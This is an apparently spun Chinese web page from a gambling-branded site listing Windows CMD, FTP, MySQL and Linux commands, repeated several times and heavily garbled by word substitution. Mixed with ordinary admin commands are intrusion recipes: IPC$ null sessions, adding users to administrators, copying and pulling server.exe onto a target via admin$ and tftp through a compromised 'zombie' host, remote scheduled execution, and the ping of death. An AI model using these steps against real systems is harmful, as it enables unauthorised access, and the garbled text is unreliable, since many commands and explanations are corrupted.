您的位置:新葡亰496net > 电脑系统 > 新葡亰496netCMD命令大全,Windows下DOS命令大全

新葡亰496netCMD命令大全,Windows下DOS命令大全

发布时间:2019-06-30 11:22编辑:电脑系统浏览(172)

    命令简要介绍

    copy \ipadmin$svv.exe c: 或:copy\ipadmin$*.* 复制对方admini$分享下的srv.exe文件(全数文件)至本地C: 

    copy \ipadmin$svv.exe c: 或:copy\ipadmin$*.* 复制对方admini$分享下的srv.exe文件(全部文件)至本土C: 

    #1 一:

    cmd是command的缩写.即命令行 。

    xcopy 要复制的文书或目录树 指标地方目录名 复制文件和目录树,用参数/Y将不晋升覆盖一样文件 

    xcopy 要复制的文件或目录树 指标地点目录名 复制文件和目录树,用参数/Y将不升迁覆盖同样文件 

    net use \ipipc$ " " /user:" " 建立IPC空链接
    net use \ipipc$ "密码" /user:"用户名" 构造建设IPC非空链接
    net use h: \ipc$ "密码" /user:"用户名" 间接登录后映射对方C:到本地为H:
    net use h: \ipc$ 登录后映射对方C:到地头为H:
    net use \ipipc$ /del 删除IPC链接
    net use h: /del 删除映射对方到本地的为H:的映射
    net user 用户名 密码 /add 创设用户
    net user guest /active:yes 激活guest用户
    net user 查看有怎么样用户
    net user 帐户名 查看帐户的属性
    net localgroup administrators 用户名 /add 把"用户"增加到管理员中使其具有管理员权限,注意:administrator后加s用复数
    net start 查看开启了怎么着服务
    net start 服务名  开启服务;(如:net start telnet, net start schedule)
    net stop 服务名 甘休某服务
    net time \对象ip 查看对方时间
    net time \对象ip /set 设置本地计算机时间与"指标IP"主机的年月同步,加上参数/yes可撤废确认音信
    net view 查看本地局域网内开启了哪些分享
    net view \ip 查看对方局域网内开启了怎么分享
    net config 展现系统互连网设置
    net logoff 断开连接的分享
    net pause 服务名 暂停某服务
    net send ip "文本信息" 向对方发音讯
    net ver 局域网内正在利用的网络连接类型和音讯
    net share 查看本地开启的分享
    net share ipc$ 开启ipc$共享
    net share ipc$ /del 删除ipc$共享
    net share c$ /del 删除C:共享
    net user guest 12345 用guest用户登入后用将密码改为12345
    net password 密码 改换系统登录密码
    netstat -a 查看开启了如何端口,常用netstat -an
    netstat -n 查看端口的互连网连接情状,常用netstat -an
    netstat -v 查看正在开始展览的劳作
    netstat -p 协议名 例:netstat -p tcq/ip 查看某议和利用情状(查看tcp/ip协议利用状态)
    netstat -s 查看正在利用的装有协议使用状态
    nbtstat -A ip 对方136到139里边四个端口开了的话,就可查看对方方今登录的用户名(03前的为用户名)-注意:参数-A要大写
    tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:"-w数字"用于安装超时间隔。
    ping ip(或域名) 向对方主机发送暗中认可大小为32字节的数据,参数:"-l[空格]数量包大小";"-n发送数据次数";"-t"指直接ping。
    ping -t -l 65550 ip 长逝之ping(发送超过64K的文件并一向ping就成了回老家之ping)
    ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数"/all"展现任何布署消息
    tlist -t 以树行列表展现进度(为系统的附加工具,私下认可是绝非设置的,在装置目录的Support/tools文件夹内)
    kill -F 进度名 加-F参数后威迫结束某经过(为系统的附加工具,暗许是从未有过设置的,在装置目录的Support/tools文件夹内)
    del -F 文件名 加-F参数后就可去除只读文件,/AQashqai、/AH、/AS、/AA分别代表删除只读、隐藏、系统、存档文件,/A-奔驰M级、/A-H、/A-S、/A-A代表删除除只读、隐藏、系统、存档以外的文本。举个例子"DEL/A奥迪Q5 *.*"表示删除当前目录下全部只读文件,"DEL/A-S *.*"表示删除当前目录下除系统文件以外的享有文件

    命令简要介绍

    固然如此随着Computer行当的上扬,Windows 操作系统的施用越发广阔,DOS 面对着被淘汰的造化,可是因为它运行安全、稳定,有的用户还在动用,所以一般Windows 的种种本子都与其相配,用户能够在Windows 系统下运维DOS,中文版Windows XP 中的命令提醒符进一步升高了与DOS 下操作命令的包容性,用户能够在命令提醒符直接输入汉语调用文件。

    tftp -i 自个儿IP(用肉机作跳板时那用肉机IP) get server.exe c:server.exe 登陆后,将"IP"的server.exe下载到目的主机c:server.exe 参数:-i指以二进制情势传送,如传送exe文件时用,如不加-i 则以ASCII方式(传送文件文件情势)进行传递 

    tftp -i 自个儿IP(用肉机作跳板时那用肉机IP) get server.exe c:server.exe 登入后,将"IP"的server.exe下载到目的主机c:server.exe 参数:-i指以二进制形式传送,如传送exe文件时用,如不加-i 则以ASCII情势(传送文件文件情势)进行传递 

    #2 二:

    cmd是command的缩写.即命令行 。

      在9x类别下输入command就能够展开命令行.而在NT系统上可以输入cmd来展开,在windows2002后被cmd代替,利用CMD命令查询系统的消息大概是判别网络的优劣。下图为CMD运营后的分界面。
    新葡亰496net 1

    tftp -i 对方IP put c:server.exe 登录后,上传本地c:server.exe至主机 

    tftp -i 对方IP put c:server.exe 登入后,上传本地c:server.exe至主机 

    del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的全体子目录和文书。同期采用参数/Q 可撤消删除操作时的系统确认就径直删除。(一个指令作用同样)
    move 盘符路径要运动的文件名 存放移动文件的路径移步后文件名 移动文件,用参数/y将撤废确认移动目录存在同样文件的提醒就径直覆盖
    fc one.txt two.txt > 3st.txt 比较一个公文并把差异之处输出到3st.txt文件中,"> "和"> >" 是重定向命令
    at id号 开启已注册的有个别安顿职务
    at /delete 截至全部布置任务,用参数/yes则无需断定就径直结束
    at id号 /delete 结束有些已登记的布署职务
    at 查看全体的陈设职分
    at \ip time 程序名(或贰个指令) /r 在某时间运作对方某先后一碗水端平新起动计算机
    finger username @host 查看前段时间有如何用户登入
    telnet ip 端口 远和登入服务器,私下认可端口为23
    open ip 连接到IP(属telnet登录后的通令)
    telnet 在本机上直接键入telnet 将跻身本机的telnet
    copy 路径文件名1 路径文件名2 /y 复制文件1到内定的目录为文件2,用参数/y就同一时间收回确认你要改写一份现有目录文件
    copy c:srv.exe \ipadmin$ 复制当地c:srv.exe到对方的admin下
    cppy 1st.jpg/b 2st.txt/a 3st.jpg 将2st.txt的故事情节藏身到1st.jpg中变化3st.jpg新的公文,注:2st.txt文本头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
    copy \ipadmin$svv.exe c: 或:copy\ipadmin$*.* 复制对方admini$分享下的srv.exe文件(全体文件)至本地C:
    xcopy 要复制的公文或目录树 指标地址目录名 复制文件和目录树,用参数/Y将不晋升覆盖一样文件
    tftp -i 本人IP(用肉机作跳板时那用肉机IP) get server.exe c:server.exe 登录后,将"IP"的server.exe下载到指标主机c:server.exe 参数:-i指以二进制情势传送,如传送exe文件时用,如不加-i 则以ASCII情势(传送文件文件形式)进行传递
    tftp -i 对方IP put c:server.exe 登入后,上传本地c:server.exe至主机
    ftp ip 端口 用于上传文件至服务器或举办文件操作,私下认可端口为21。bin指用二进制格局传送(可实施文件进);默以为ASCII格式传送(文本文件时)
    route print 突显出IP路由,将器重展现互连网地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
    arp 查看和拍卖ARP缓存,ARP是名字深入分析的意趣,负担把三个IP剖析成一个物理性的MAC地址。arp -a将显得出全体消息
    start 程序名或指令 /max 或/min 新开二个新窗口并最大化(最小化)运转某先后或指令
    mem 查看cpu使用情状
    attrib 文件名(目录名) 查看某文件(目录)的性质
    attrib 文件名 -A -奥迪Q5 -S -H 或 A Evoque S H 去掉(增加)某文件的 存档,只读,系统,隐藏 属性;用+则是增添为某属性
    dir 查看文件,参数:/Q展现文件及目录属系统哪个用户,/T:C突显文件创造时间,/T:A突显文件上次被访问时间,/T:W上次被涂改时间
    date /t 、 time /t 使用此参数即"DATE/T"、"TIME/T"将只展现当前些天期和时间,而不必输入新日期和岁月
    set 钦点景况变量名称=要指派给变量的字符 设置情状变量
    set 展现当前享有的境遇变量
    set p(或别的字符) 展现出当下以字符p(或别的字符)开端的富有景况变量
    pause 暂停批管理程序,并显示出:请按放肆键继续....
    if 在批管理程序中施行尺度管理(越多表达见if命令及变量)
    goto 标签 将cmd.exe导向到批管理程序中带标签的行(标签必须独立一行,且以冒号打头,比方:":start"标签)
    call 路径批管理公事名 从批管理程序中调用另二个批管理程序 (越来越多表达见call /?)
    for 对一组文件中的每三个文件举行有个别特定命令(更加的多表明见for命令及变量)
    echo on或off 展开或关闭echo,仅用echo不加参数则呈现当前echo设置
    echo 音讯 在显示器上出示出消息
    echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
    findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
    find 文件名 查找某文件
    title 标题名字 改变CMD窗口题目名字
    color 颜色值 设置cmd调整台前景和背景颜色;0=黑、1=蓝、2=绿、3=威尼斯红、4=红、5=紫、6=黄、7=白、8=灰、9=葱白、A=稻草黄、B=淡铅白、C=粉末蓝、D=深翠绿、E=孔雀绿、F=亮白
    prompt 名称 改换cmd.exe的来得的通令提醒符(把C:、D:合併改为:EntSky )

    虽说随着Computer行当的向上,Windows 操作系统的利用尤其常见,DOS 面对着被淘汰的造化,但是因为它运维安全、牢固,有的用户还在运用,所以一般Windows 的各样本子都与其合作,用户可以在Windows 系统下运维DOS,中文版Windows XP 中的命令提醒符进一步进步了与DOS 下操作命令的包容性,用户可以在命令提醒符直接输入普通话调用文件。

    运维操作

    ftp ip 端口 用于上传文件至服务器或开始展览文件操作,默许端口为21。bin指用二进制方式传递(可奉行文件进);

    ftp ip 端口 用于上传文件至服务器或举办文件操作,暗许端口为21。bin指用二进制格局传送(可推行文件进);

    #3 三:

      在9x种类下输入command就能够张开命令行.而在NT系统上得以输入cmd来展开,在windows二〇〇〇后被cmd代替,利用CMD命令查询系统的新闻照旧是推断互连网的高低。下图为CMD运营后的分界面。
    新葡亰496net 2

    CMD命令:发轫->运营->键入cmd或command(在命令行里能够见到系统版本、文件系统版本)

    默以为ASCII格式传送(文本文件时) 

    默感觉ASCII格式传送(文本文件时) 

    ver 在DOS窗口下显得版本音讯
    winver 弹出一个窗口展现版本音讯(内部存储器大小、系统版本、补丁版本、Computer名)
    format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
    md 目录名 成立目录
    replace 源文件 要替换文件的目录 替换文件
    ren 原著件名 新文件名 重命名文件名
    tree 以树形结构展现出目录,用参数-f 将列出第个文本夹中文件名称
    type 文件名 彰显文本文件的源委
    more 文件名 逐屏展现输出文件
    doskey 要锁定的一声令下=字符
    doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并成立宏)。如:锁定dir命令:doskey dir=entsky (不能够用doskey dir=dir);解锁:doskey dir=
    taskmgr 调出义务管理器
    chkdsk /F D: 检查磁盘D并展示状态报告;加参数/f并修复磁盘上的荒唐
    tlntadmn telnt服务admn,键入tlntadmn选用3,再选用8,就能够更动telnet服务默许端口23为任何任何端口
    exit 退出cmd.exe程序或最近,用参数/B则是退出当前批管理脚本而不是cmd.exe
    path 路径可推行文件的文书名 为可实行文件设置八个渠道。
    cmd 运营三个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令增添;更小编详细表达见cmd /?
    regedit /s 注册表文件名 导入注册表;参数/S指安静方式导入,无任何提醒;
    regedit /e 注册表文件名 导出注册表
    cacls 文件名 参数字展现示或改换文件访问调控列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换钦定用户的拜访权限;/G 用户名:perm 赋予钦定用户访问权限;Perm 能够是: N 无,昂科拉 读取, W 写入, C 改变(写入),F 完全调整;例:cacls D:test.txt /D pub 设定d:test.txt拒绝pub用户访问。
    cacls 文件名 查看文件的访问用户权限列表
    REM 文本内容 在批管理公事中增添申明
    netsh 查看或转移当地互联网配置情状

    运作操作 CMD命令:开端->运维->键入cmd或command(在指令行里能够见见系统版本、文件系统版本) CMD命令锦集       1. gpedit.msc-----组计谋   2. sndrec32-------录音机   3. Nslookup-------IP地址侦测器 ,是三个 监测互连网中 DNS 服务器是不是能精确贯彻域名深入分析的命令行工具。 它在 Windows NT/2000/XP 中均可选择 , 但在 Windows 98 中却从未并轨那叁个工具。   4. explorer-------开发能源管理器   5. logoff---------打消命令   6. shutdown-------60秒倒计时关机命令   7. lusrmgr.msc----本机用户和组   8. services.msc---本地服务设置   9. oobe/msoobe /a----检查XP是还是不是激活   10. notepad--------展开记事本   11. cleanmgr-------垃圾整理   12. net start messenger----发轫信使服务   13. compmgmt.msc---计算机管理   14. net stop messenger-----结束信使服务   15. conf-----------开发银行netmeeting   16. dvdplay--------DVD播放器   17. charmap--------运行字符映射表   18. diskmgmt.msc---磁盘管理实用程序   19. calc-----------起步总计器   20. dfrg.msc-------磁盘碎片整理程序   21. chkdsk.exe-----Chkdsk磁盘检查   22. devmgmt.msc--- 设备管理器   23. regsvr32 /u *.dll----甘休dll文件运维   24. drwtsn32------ 系统医务人士  25. rononce -p----15秒关机   26. dxdiag---------反省DirectX信息  27. regedt32-------注册表编辑器   28. Msconfig.exe---系统安顿实用程序   29. rsop.msc-------组战术结果集   30. mem.exe--------显示内部存款和储蓄器使用情形   31. regedit.exe----报了名表   32. winchat--------XP自带局域网聊天   33. progman--------程序管理器   34. winmsd---------系统音信   35. perfmon.msc----Computer品质监测程序   36. winver---------检查Windows版本   37. sfc /scannow-----扫描错误并回复   38. taskmgr-----任务管理器(2000/xp/二〇〇三   40. wmimgmt.msc----打开windows管理连串结构(WMI)   41. wupdmgr--------windows更新程序   42. wscript--------windows脚本宿主设置   43. write----------写字板   45. wiaacmgr-------扫描仪和相机向导   46. winchat--------XP自带局域网聊天   49. mplayer2-------简易widnows media player   50. mspaint--------画图板   51. mstsc----------远程桌面连接   53. magnify--------放大镜实用程序   54. mmc------------展开调节台   55. mobsync--------同步命令   57. iexpress-------木马捆绑工具,系统自带   58. fsmgmt.msc-----分享文件夹管理器   59. utilman--------支持理工科程师具管理器   61. dcomcnfg-------打开系统组件服务   62. ddeshare-------张开DDE共享设置   110. osk------------展开显示器键盘   111. odbcad32-------ODBC数据源管理器   112. oobe/msoobe /a----反省XP是不是激活   68. ntbackup-------系统备份和卷土而来   69. narrator-------荧屏“叙述人”   70. ntmsmgr.msc----移动存储管理器   71. ntmsoprq.msc---移动存款和储蓄管理员操作央求   72. netstat -an----(TC)命令检查接口   73. syncapp--------创办一个文书包   74. sysedit--------系统布局编辑器   75. sigverif-------文书具名验证程序   76. ciadv.msc------索引服务程序   77. shrpubw--------开立分享文件夹   78. secpol.msc-----本地安全策略  79. syskey---------系统加密,一旦加密就不能够解开,爱护windows xp系统的再一次密码   80. services.msc---本地服务设置   81. Sndvol32-------音量调整造进程序   82. sfc.exe--------系统文件检查器   83. sfc /scannow---windows文件爱戴   84. ciadv.msc------索引服务程序   85. tourstart------xp简要介绍(安装到位后边世的出境游xp程序)   86. taskmgr--------职务管理器   87. eventvwr-------事件查看器   88. eudcedit-------造字程序   89. compmgmt.msc---Computer管理   90. packager-------对象包装程序   91. perfmon.msc----Computer质量监测程序   92. charmap--------运维字符映射表   93. cliconfg-------SQL SE中华VVE宝马7系客户端网络实用程序   94. Clipbrd--------剪贴板查看器   95. conf-----------运行netmeeting   96. certmgr.msc----证书管理实用程序   97. regsvr32 /u *.dll----甘休dll文件运营   98. regsvr32 /u zipfldr.dll------裁撤ZIP协理   99. cmd.exe--------CMD限令提示符 操作详解         net use ipipc$ " " /user:" " 创设IPC空链接   net use ipipc$ "密码" /user:"用户名" 创建IPC非空链接   net use h: ipc$ "密码" /user:"用户名" 直接登入后映射对方C:到地面为H:   net use h: ipc$ 登入后映射对方C:到本地为H:   net use ipipc$ /del 删除IPC链接   net use h: /del 删除映射对方到本地的为H:的映射   net user 用户名 密码 /add 创立用户   net user guest /active:yes 激活guest用户   net user 查看有哪些用户   net user 帐户名 查看帐户的属性   net localgroup administrators 用户名 /add 把“用户”增多到管理员中使其负有管理员权限   net start 查看开启了如何服务   net start 服务名 开启服务;(如:net start telnet, net start schedule)   net stop 服务名 结束某服务   net time 指标ip 查看对方时间   net time 目的ip /set 设置本地Computer时间与“目的IP”主机的岁月一起,加上参数/yes可撤除确认音信  net view 查看当地局域网内开启了什么样分享   net view ip 查看对方局域网内开启了如何分享   net config 突显系统互连网设置   net logoff 断开连接的分享   net pause 服务名 暂停某服务   net send ip "文本音讯" 向对方发音信   net ver 局域网内正在利用的网络连接类型和音信  net share 查看本地开启的分享   net share ipc$ 开启ipc$共享   net share ipc$ /del 删除ipc$分享   net share c$ /del 删除C:分享   net user guest 12345 用guest用户登入后用将密码改为12345   net password 密码 退换系统登入密码   netstat -a 查看开启了何等端口,常用netstat -an   netstat -n 查看端口的互连网连接情形,常用netstat -an   netstat -v 查看正在开始展览的劳作   netstat -p 协议名 例:netstat -p tcq/ip 查看某商量使用情状   netstat -s 查看正在使用的持有协议利用状况  nbtstat -A ip 对方136到139里边贰个端口开了的话,就可查阅对方近期登入的用户名   tracert -参数 ip(或微型计算机名) 追踪路由(数据包),参数:“-w数字”用于安装超时间隔。   ping ip(或域名) 向对方主机发送暗中同意大小为32字节的多少,参数:“-l[空格]数码包大小”;“-n发送数据次数”;“-t”指直接ping。   ping -t -l 65550 ip 病逝之ping(发送超越64K的文件并直接ping就成了病逝之ping)   ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示整个安顿音讯   tlist -t 以树行列表彰显进度(为系统的附加工具,暗许是从未有过安装的,在装置目录的Support/tools文件夹内)   kill -F 进程名 加-F参数后强制停止某进程(为系统的附加工具,暗许是绝非设置的,在装置目录的Support/tools文件夹内)   del -F 文件名 加-F参数后就可去除只读文件,/AOdyssey、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-中华V、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文书。举个例子“DEL/A瑞鹰 *.*”表示删除当前目录下具有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的持有文件   del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的全体子目录和文件。同不平日间利用参数/Q 可收回删除操作时的种类确认就径直删除。(一个指令作用同样)   move 盘符路径要活动的公文名 存放移动文件的门路移动后文件名 移动文件,用参数/y将打消确认移动目录存在一样文件的提示就一贯覆盖   fc one.txt two.txt > 3st.txt 比较一个文件并把差别之处输出到3st.txt文件中,"> "和"> >" 是重定向命令   at id号 开启已注册的某部布置职责   at /delete 停止全体安顿职分,用参数/yes则没有要求肯定就径直甘休   at id号 /delete 结束有些已登记的安顿职责   at 查看全部的布置任务   at ip time 程序名(或多个限令) /r 在某时间运作对方某先后仁同一视新起动Computer   finger username @host 查看近些日子有怎么着用户登入   telnet ip 端口 远和登入服务器,暗中同意端口为23   open ip 连接到IP(属telnet登录后的下令)   telnet 在本机上直接键入telnet 将进入本机的telnet   copy 路线文件名1 路线文件名2 /y 复制文件1到钦定的目录为文件2,用参数/y就同一时候收回确认你要改写一份现有目录文件   copy c:srv.exe ipadmin$ 复制本地c:srv.exe到对方的admin下   copy 1st.jpg/b 2st.txt/a 3st.jpg 将2st.txt的剧情藏身到1st.jpg中变化3st.jpg新的文件,注:2st.txt文本头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件   copy ipadmin$svv.exe c: 或:copyipadmin$*.* 复制对方admini$分享下的srv.exe文件(全数文件)至本地C:   xcopy 要复制的文本或目录树 指标地点目录名 复制文件和目录树,用参数/Y将不升迁覆盖相同文件   用参数/e才可连目录下的子目录一齐复制到目的地址下。   tftp -i 本人IP(用肉机作跳板时那用肉机IP) get server.exe c:server.exe 登录后,将“IP”的server.exe下载到指标主机c:server.exe 参数:-i指以二进制形式传送,如传送exe文件时用,如不加-i 则以ASCII情势(传送文件文件形式)实行传递   tftp -i 对方IP put c:server.exe 登录后,上传当地c:server.exe至主机   ftp ip 端口 用于上传文件至服务器或开始展览文件操作,私下认可端口为21。bin指用二进制情势传递(可实行文件进);默感到ASCII格式传送(文本文件时)   route print 呈现出IP路由,将注重展现网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface   arp 查看和拍卖ARP缓存,ARP是名字深入分析的情致,担当把叁个IP深入分析成三个物理性的MAC地址。arp -a将显示出全数音讯   start 程序名或指令 /max 或/min 新开二个新窗口并最大化(最小化)运维某先后或指令   mem 查看cpu使用境况  attrib 文件名(目录名) 查看某文件(目录)的性子   attrib 文件名 -A -ENCORE -S -H 或 A 猎豹CS6 S H 去掉(增添)某文件的 存档,只读,系统,隐藏 属性;用 则是增加为某属性   dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C呈现文件创立时间,/T:A展现文件上次被访问时间,/T:W上次被涂改时间   date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当今日期和岁月,而无需输入新日期和岁月   set 钦命情形变量名称=要指派给变量的字符 设置景况变量   set 突显当前具备的情形变量   set p(或其余字符) 展现出当下以字符p(或其它字符)起首的富有情形变量   pause 暂停批管理程序,并出示出:请按大肆键继续....   if 在批处理程序中施行标准管理(越来越多表达见if命令及变量)   goto 标签 将cmd.exe导向到批管理程序中带标签的行(标签必须独立一行,且以冒号打头,比方:“:start”标签)   call 路线批处理文件名 从批管理程序中调用另二个批管理程序 (越多表明见call /?)   for 对一组文件中的每四个文件进行有个别特定命令(越多表明见for命令及变量)   echo on或off 张开或关闭echo,仅用echo不加参数则突显当前echo设置   echo 音信 在显示器上出示出新闻   echo 音信 >> pass.txt 将"音信"保存到pass.txt文件中   findstr "Hello" aa.txt 在aa.txt文件中追寻字符串hello   find 文件名 查找某文件   title 标题名字 改变CMD窗口题目名字   color 颜色值 设置cmd调控台前景和背景颜色;0=黑、1=蓝、2=绿、3=海水绿、4=红、5=紫、6=黄、7=白、8=灰、9=葱白、A=深棕黑、B=淡玛瑙红、C=肉桂色、D=藤黄、E=藏蓝色、F=亮白   prompt 名称 改换cmd.exe的展现的下令提醒符(把C:、D:统一改为:EntSky )   ver 在DOS窗口下显得版本消息   winver 弹出二个窗口显示版本信息(内部存储器大小、系统版本、补丁版本、Computer名)   format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS   md 目录名 创设目录   replace 源文件 要替换文件的目录 替换文件   ren 原著件名 新文件名 重命名文件名   tree 以树形结构展现出目录,用参数-f 将列出第个文本夹汉语件名称   type 文件名 彰显文本文件的内容   more 文件名 逐屏展现输出文件   doskey 要锁定的通令=字符   doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创立宏)。如:锁定dir命令:doskey dir=entsky (不可能用doskey dir=dir);解锁:doskey dir=   taskmgr 调出义务处理器   chkdsk /F D: 检查磁盘D并出示状态报告;加参数/f并修复磁盘上的失实   tlntadmn telnt服务admn,键入tlntadmn选用3,再选取8,就能够改动telnet服务私下认可端口23为其它任何端口   exit 退出cmd.exe程序或最近,用参数/B则是脱离当前批管理脚本而不是cmd.exe   path 路线可推行文件的公文名 为可推行文件设置四个路子。   cmd 运行一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩充;更笔者详细表明见cmd /?   regedit /s 注册表文件名导入注册表;参数/S指安静情势导入,无别的提醒;   regedit /e 注册表文件名 导出挂号表   cacls 文件名 参数字突显示或改造文件访问调整列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换钦赐用户的访问权限;/G 用户名:perm 赋予钦定用户访问权限;Perm 能够是: N 无,卡宴 读取, W 写入, C 更动(写入),F 完全调控;例:cacls D: est.txt /D pub 设定d: est.txt拒绝pub用户访问。   cacls 文件名 查看文件的拜访用户权限列表   REM 文本内容 在批管理公事中增加表明   netsh 查看或转移当地网络配置情形   IIS服务命令   iisreset /reboot 重启win2kComputer(但有提醒系统将重启音讯出现)   iisreset /start或stop 运行(结束)全数Internet服务   iisreset /restart 结束然后再一次开动全部Internet服务   iisreset /status 显示全部Internet服务情况   iisreset /enable或disable 在地面系统上启用(禁止使用)Internet服务的重复启航   iisreset /rebootonerror 当运行、截止或重复开动Internet服务时,若产生错误将再一次开机   iisreset /noforce 若不能够甘休Internet服务,将不会强制截至Internet服务   iisreset /timeout Val在达到逾时间(秒)时,仍未甘休Internet服务,若内定/rebootonerror参数,则计算机将会再也开机。预设值为重新起动20秒,停止60秒,重新开机0秒。   FTP 命令: (后边有详细表明内容)   ftp的下令行格式为:   ftp -v -d -i -n -g[主机名] -v 显示远程服务器的全体响应音信。   -d 使用调节和测验情势。   -n 限制ftp的自发性登入,即不使用.netrc文件。   -g 撤除全局文件名。   help [命令] 或 ?[命令] 查看命令表达   bye 或 quit 终止主机FTP进度,并退出FTP管理格局.   pwd 列出当下远端主机目录   put 或 send 当麻芋果件名 [上传到主机上的文书名] 将地面叁个文书传送至远端主机中   get 或 recv [远程主机文件名] [下载到地头后的文书名] 从远端主机中传送至地面主机中   mget [remote-files] 从远端主机接收一堆文件至地面主机   mput local-files 将地面主机中一堆文件传送至远端主机   dir 或 ls [remote-directory] [local-file] 列出这段日子远端主机目录中的文件.假设有地点文件,就将结果写至地面文件   ascii 设定以ASCII格局传送文件(缺省值)   bin 或 image 设定以二进制方式传递文件   bell 每成功三遍文件传送,报警提示   cdup 重临上一级目录   close 中断与长途服务器的ftp会话(与open对应)   open host[port] 创设钦点ftp服务器连接,可钦命连接端口   delete 删除远端主机中的文件   mdelete [remote-files] 删除一群文件   mkdir directory-name 在远端主机中确立目录   rename [from] [to] 更改远端主机中的文件名   rmdir directory-name 删除远端主机中的目录   status 显示当前FTP的景观   system 展现远端主机系统项目   user user-name [password] [account] 重新以别的用户名登陆远端主机   open host [port] 重新创立贰个新的接连   prompt 交互提醒方式   macdef 定义宏命令   lcd 退换近年来本土主机的行事目录,假如缺省,就转到当前用户的HOME目录   chmod 改动远端主机的文件权限   case 当为ON时,用MGET命令拷贝的文书名到地头机械中,全体转变为小写字母   cd remote-dir 进入远程主机目录   cdup 进入远程主机目录的父目录   ! 在该地机中推行交互shell,exit回到ftp处境,如!ls*.zip   #5   MYSQL 命令   mysql -h主机地址 -u用户名 -p密码 连接MYSQL;若是刚安装好MYSQL,一流用户root是不曾密码的。   (例:mysql -h110.110.110.110 -Uroot -P123456   注:u与root能够绝不加空格,别的也长久以来)   exit 退出MYSQL   mysqladmin -u用户名 -p旧密码 password 新密码 修改密码   grant select on 数据库.* to 用户名@登入主机 identified by "密码"; 扩展新用户。(注意:和地点分化,下边包车型大巴因为是MYSQL情形中的命令,所今后边都带一个分企业作为命令结束符)   show databases; 突显数据库列表。刚开端时才多少个数据库:mysql和test。mysql库很关键它个中有MYSQL的系统音信,大家改密码和新增用户,实际上就是用这么些库举行操作。   use mysql;   show tables; 展现库中的数据表   describe 表名; 展现数据表的结构   create database 库名; 建库   use 库名;   create table 表名 (字段设定列表); 建表   drop database 库名;   drop table 表名; 删库和删表   delete from 表名; 将表中记录清空   select * from 表名; 呈现表中的笔录   mysqldump --opt school>school.bbb 备份数据库:(命令在DOS的mysqlin目录下试行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文件文件,文件名任取,展开看看您会有新意识。   win二零零四种类下新添命令(实用部份):   shutdown /参数 关闭或重启本地或远程主机。   参数表达:/S 关闭主机,/Sportage 重启主机, /T 数字 设定延时的时刻,范围0~180秒之内, /A撤消开机,/M //IP 钦赐的中距离主机。   例:shutdown /r /t 0 马上重启本地主机(无延时)   taskill /参数 进程名或进程的pid 终止一个或多少个任务和经过。   参数表达:/PID 要甘休进度的pid,可用tasklist命令得到各进程的pid,/IM 要适可而止的经过的经过名,/F 强制甘休进度,/T 终止指定的历程及她所运营的子进程。   tasklist 呈现当前运作在本地和长途主机上的进程、服务、服务各进度的进度标记符(PID)。   参数表达:/M 列出当前进程加载的dll文件,/SVC 展现出各种进度对应的劳务,无参数时就只列出脚下的长河。   Linux系统下中央命令 注:要分别轻重缓急写   uname 显示版本新闻(同win2K的 ver)   dir 展现当前目录文件,ls -al 突显包蕴隐藏文件(同win2K的 dir)   pwd 查询当前所在的目录地点   cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /重回到根目录。   cat 文件名 查看文件内容   cat >abc.txt 往abc.txt文件中写上内容。   more 文件名 以一页一页的方法体现一个文本文件。   cp 复制文件   mv 移动文件   rm 文件名 删除文件,rm -a 目录名删除目录及子目录   mkdir 目录名 营造目录   rmdir 删除子目录,目录内并未有文书档案。   chmod 设定档案或目录的存取权限   grep 在档案中追寻字符串   diff 档案文件相比较   find 档案搜寻   date 今后的日期、时间   who 查询近年来和你选取同样台机械的人以及Login时间地方   w 查询近年来上机者的详细资料   whoami 查看自个儿的帐号名称   groups 查看某个人的Group   passwd 改造密码   history 查看自身下过的指令   ps 呈现进度景况   kill 结束某经过   gcc 红客平时用它来编写翻译C语言写的文本   su 权限转变为钦点使用者   telnet IP telnet连接对方主机(同win2K),当出现bash$时就证实连接成功。   ftp ftp连接上某服务器(同win2K)   批管理命令与变量   1:for命令及变量 基本格式   FOTiguan /参数 %variable IN (set) DO command [command_parameters] %variable:钦点一个单纯字母可替换的参数,如:%i ,而钦点叁个变量则用:%%i ,而调用变量时用:%i% ,变量是分别轻重缓急写的(%i 不等于 %I)。   批管理每一回能管理的变量从%0—%9共13个,当中%0暗中认可给批管理公事名使用,%1默以为利用此批管理时输入的的第二个值,同理:%2—%9指输入的第2-9个值;例:net use ipipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3   (set):钦赐二个或一组文件,可使用通配符,如:(D:user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第七个"1"指初步值,第二个"1"指增加量,第二个"254"指终结值,即:从1到254;“(1 -1 254)”表达:即从254到1 }   command:钦赐对第个文本实践的授命,如:net use命令;如要实行七个指令时,命令那间加:& 来隔离  command_parameters:为特定命令钦赐参数或命令行开关   IN (set):指在(set)中取值;DO command 